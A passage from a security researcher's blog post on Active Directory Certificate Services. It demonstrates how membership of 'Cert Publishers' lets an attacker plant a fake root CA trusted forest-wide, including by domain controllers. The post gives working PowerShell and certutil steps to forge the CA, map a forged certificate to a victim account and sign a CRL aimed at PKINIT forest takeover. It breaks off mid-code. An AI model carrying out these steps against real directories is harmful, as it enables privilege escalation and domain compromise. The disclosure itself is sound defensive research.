{"id":1247,"date":"2025-03-17T17:34:41","date_gmt":"2025-03-17T16:34:41","guid":{"rendered":"https:\/\/blog.chrisse.se\/?p=1247"},"modified":"2025-03-17T17:34:41","modified_gmt":"2025-03-17T16:34:41","slug":"when-your-enterprise-pki-becomes-one-of-your-enemies-part-6","status":"publish","type":"post","link":"https:\/\/blog.chrisse.se\/?p=1247","title":{"rendered":"When your Enterprise PKI becomes one of your enemies (Part 6)"},"content":{"rendered":"\n<p><strong>Create, Distribute enforce Trust of a fake CA from T1 &#8211; PKINIT\u2013 altSecurityIdentities + AMA + Cert Publishers<\/strong><\/p>\n\n\n\n<p>Let&#8217;s assume that &#8216;Issuing CA 2&#8217; here is managed from T1 and not trusted in &#8216;NTAuth&#8217; &#8211; should not be a problem or?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"559\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2-1024x559.png\" alt=\"\" class=\"wp-image-1237\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2-1024x559.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2-300x164.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2-768x419.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/image-2.png 1420w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>In this scenario a Tier 1 administrator could logon to &#8216;Issuing CA 2&#8217; become SYSTEM and acting as the machines security context.<br>Enterprise CAs are automatically added to the &#8216;Cert Publishers&#8217; Group and that group is always given &#8216;Full Control&#8217; to a Enterprise CAs &#8216;certificationAuthority&#8217; object within &#8216;CN=Certification Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com&#8217;<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"632\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub-1024x632.png\" alt=\"\" class=\"wp-image-1238\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub-1024x632.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub-300x185.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub-768x474.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/Cert-Pub.png 1417w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>This is unfortunately hardcoded into the installation of an Enterprise CA &#8211; But now to the interesting part what can you do if you&#8217;re member of &#8216;Cert Publishers&#8217;?<br><br>Well let&#8217;s create our own fake CA and a leaf certificate contain the AMA Issuance policy OID:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">CreateFakeCA and Leaf without CRL<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Import-Module -Name CertRequestTools\n$CertPolicies = New-CertificatePoliciesExtension -Oid &quot;2.5.29.32.0&quot; \n$AmaExtension = New-CertificatePoliciesExtension -Oid &quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;\n\n$signer = New-SelfSignedCertificate -KeyExportPolicy Exportable `\n -CertStoreLocation Cert:\\CurrentUser\\My `\n -Subject &quot;CN=Chrisse Root CA,DC=chrisse,DC=com&quot; `\n -NotAfter (Get-Date).AddYears(1) `\n -HashAlgorithm sha256 `\n -KeyusageProperty All `\n -KeyUsage CertSign, CRLSign, DigitalSignature `\n -Extension $CertPolicies `\n -TextExtension @('2.5.29.37={text}1.3.6.1.4.1.311.10.12.1', '2.5.29.19={text}CA=1&amp;pathlength=3')\n\n $params = @{\n    Type = 'Custom'\n    Subject = 'CN=DEMO5 - fakecaso1'\n    #KeySpec = 'Signature'\n    KeyExportPolicy = 'Exportable'\n    KeyLength = 2048\n    HashAlgorithm = 'sha256'\n    NotAfter = (Get-Date).AddMonths(10)\n    CertStoreLocation = 'Cert:\\CurrentUser\\My'\n    Signer = $signer\n    TextExtension = @(\n     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',\n     '2.5.29.17={text}upn=caso@nttest.chrisse.com')\n    Extension =  $AmaExtension\n}\nNew-SelfSignedCertificate @params\nExport-Certificate -Cert $signer -FilePath FakeCA.cer\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #6F42C1\">Import-Module<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name CertRequestTools<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CertPolicies <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;2.5.29.32.0&quot;<\/span><span style=\"color: #24292EFF\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$AmaExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-SelfSignedCertificate<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">KeyExportPolicy Exportable <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">CertStoreLocation Cert:\\CurrentUser\\My <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Subject <\/span><span style=\"color: #22863A\">&quot;CN=Chrisse Root CA,DC=chrisse,DC=com&quot;<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">NotAfter (<\/span><span style=\"color: #6F42C1\">Get-Date<\/span><span style=\"color: #24292EFF\">).AddYears(<\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">) <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">HashAlgorithm sha256 <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">KeyusageProperty All <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">KeyUsage CertSign<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> CRLSign<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> DigitalSignature <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Extension $CertPolicies <\/span><span style=\"color: #D32F2F\">`<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">TextExtension <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">(<\/span><span style=\"color: #22863A\">&#39;2.5.29.37={text}1.3.6.1.4.1.311.10.12.1&#39;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;2.5.29.19={text}CA=1&amp;pathlength=3&#39;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\"> $params <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Type <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Custom&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Subject <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;CN=DEMO5 - fakecaso1&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #C2C3C5\">#KeySpec = &#39;Signature&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyExportPolicy <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Exportable&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyLength <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">2048<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    HashAlgorithm <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;sha256&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    NotAfter <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> (<\/span><span style=\"color: #6F42C1\">Get-Date<\/span><span style=\"color: #24292EFF\">).AddMonths(<\/span><span style=\"color: #1976D2\">10<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    CertStoreLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Cert:\\CurrentUser\\My&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $signer<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    TextExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.37={text}1.3.6.1.5.5.7.3.2&#39;<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.17={text}upn=caso@nttest.chrisse.com&#39;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Extension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\">  $AmaExtension<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">New-SelfSignedCertificate<\/span><span style=\"color: #24292EFF\"> @params<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">Export-Certificate<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Cert $signer <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">FilePath FakeCA.cer<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Find any user within the forest where you can write to the &#8216;altSecurityIdentities&#8217; attribute<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Set-AltSecurityIdentities<\/span><span role=\"button\" tabindex=\"0\" data-code=\"$cert  = ls Cert:\\CurrentUser\\my | where { $_.subject -eq &quot;CN=DEMO5 - fakecaso1&quot; }\n.\\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">$cert  <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> ls Cert:\\CurrentUser\\my <\/span><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">where<\/span><span style=\"color: #24292EFF\"> { <\/span><span style=\"color: #1976D2\">$_.subject<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;CN=DEMO5 - fakecaso1&quot;<\/span><span style=\"color: #24292EFF\"> }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">.<\/span><span style=\"color: #6F42C1\">\\Set-AltSecurityIdentities.ps1<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Identity CASO <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">MappingType IssuerSerialNumber <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Certificate $cert<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>So we now have a CA &#8216;CN=Chrisse Root CA,DC=chrisse,DC=com&#8217; and a certificate issued by the CA &#8220;CN=DEMO5 &#8211; fakecaso3&#8221; with the AMA Issuance OID. There is a reason why the CA is named &#8220;CN=Chrisse Root CA,DC=chrisse,DC=com&#8221; (The name of an already existing root CA within the forest &#8211; and that is because how certutil -dspublish will handle the CA certificate.<br>So now let&#8217;s become SYSTEM on &#8216;Issuing CA 2&#8217; that&#8217;s by default member of the &#8216;Cert Publishers&#8217; group &#8211; now let&#8217;s add the CA certificate to Active Directory using certutil.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">cmd<\/span><span role=\"button\" tabindex=\"0\" data-code=\"certutil -dspublish -f .\\FakeCA.cer rootca\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292eff\">certutil -dspublish -f .\\FakeCA.cer rootca<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"844\" height=\"133\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/certutil-2.png\" alt=\"\" class=\"wp-image-1251\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/certutil-2.png 844w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/certutil-2-300x47.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/certutil-2-768x121.png 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p><br>Opps &#8211; that worked &#8211; so what happened? Basically as certutil was running as SYSTEM on &#8216;Issuing CA 2&#8217; being member of &#8216;Cert Publishers&#8217; it had the ability to write the certificate of our &#8216;Fake CA&#8217; into the existing object of &#8216;<br>CN=Chrisse Root CA,CN=Certificate Authorities,CN=Public Key Services,CN=Services,CN=Configuration,DC=nttest,DC=chrisse,DC=com&#8217;s &#8216;cACertificate&#8217; attribute becuse the subject matched &#8216;CN=Chrisse Root CA,DC=chrisse,DC=com&#8217;<br>Our &#8216;Fake CA&#8217; certificate is now the 2:nd value added to the &#8216;cACertificate&#8217; attribute<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"822\" height=\"481\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCACertificate.png\" alt=\"\" class=\"wp-image-1253\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCACertificate.png 822w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCACertificate-300x176.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCACertificate-768x449.png 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>Now the interesting part &#8211; will all domain joined clients within this forest now trust our &#8216;Fake CA&#8217;?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"496\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC-1024x496.png\" alt=\"\" class=\"wp-image-1254\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC-1024x496.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC-300x145.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC-768x372.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/FakeCAonDC.png 1474w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>Ops again, yep even on Domain Controllers (DCs) \/ Key Distribution Centers (KDCs). So what can we do now, the lead certificate we issued above with the AMA Issuance Policy OID can we use it to perform PKINIT and take over the forest?<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"939\" height=\"658\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/NoCDP.png\" alt=\"\" class=\"wp-image-1255\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/NoCDP.png 939w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/NoCDP-300x210.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/NoCDP-768x538.png 768w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>Nope &#8211; not possible (at least not yet \ud83d\ude42 ) &#8211; even that the certificate don&#8217;t have a CDP extension at all, the KDC demands that all certificates used by PKINIT needs to have a valid CDP or OCSP. What if we fix that as well?<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Create and Sign CRL with Fake CA<\/span><span role=\"button\" tabindex=\"0\" data-code=\"Import-Module -Name CertRequestTools\n$Crl = [CERTENROLLlib.CX509CertificateRevocationListClass]::new()\n$Crl.Initialize()\n$dn = [CERTENROLLlib.CX500DistinguishedNameClass]::new()\n$dn.Encode(&quot;CN=Chrisse Root CA,DC=chrisse,DC=com&quot;, [CERTENROLLlib.x500NameFlags]::XCN_CERT_X500_NAME_STR)\n$Crl.Issuer = $dn\n$Crl.CRLNumber([CERTENROLLlib.EncodingType]::XCN_CRYPT_STRING_HEX) = &quot;0001&quot;\n$signer = [CERTENROLLlib.CSignerCertificateClass]::new()\n# Note the thumbprint below is the 'Fake CA' certificate with the private key available \n$signer.Initialize($false,[CERTENROLLlib.X509PrivateKeyVerify]::VerifyNone, [CERTENROLLlib.EncodingType]::XCN_CRYPT_STRING_HEXRAW, &quot;D948F2E5585FD3C7802263DAED9722E67315FA02&quot;)\n$Crl.SignerCertificate = $signer\n$Crl.Encode()\n\n[System.IO.File]::WriteAllBytes(&quot;fakeca.crl&quot;, [System.Convert]::FromBase64String($Crl.RawData()))\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #6F42C1\">Import-Module<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Name CertRequestTools<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.CX509CertificateRevocationListClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.Initialize()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$dn <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.CX500DistinguishedNameClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$dn.Encode(<\/span><span style=\"color: #22863A\">&quot;CN=Chrisse Root CA,DC=chrisse,DC=com&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.x500NameFlags<\/span><span style=\"color: #24292EFF\">]::XCN_CERT_X500_NAME_STR)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.Issuer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $dn<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.CRLNumber([<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.EncodingType<\/span><span style=\"color: #24292EFF\">]::XCN_CRYPT_STRING_HEX) <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;0001&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.CSignerCertificateClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># Note the thumbprint below is the &#39;Fake CA&#39; certificate with the private key available <\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$signer.Initialize(<\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\">[<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.X509PrivateKeyVerify<\/span><span style=\"color: #24292EFF\">]::VerifyNone<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENROLLlib.EncodingType<\/span><span style=\"color: #24292EFF\">]::XCN_CRYPT_STRING_HEXRAW<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;D948F2E5585FD3C7802263DAED9722E67315FA02&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.SignerCertificate <\/span><span style=\"color: 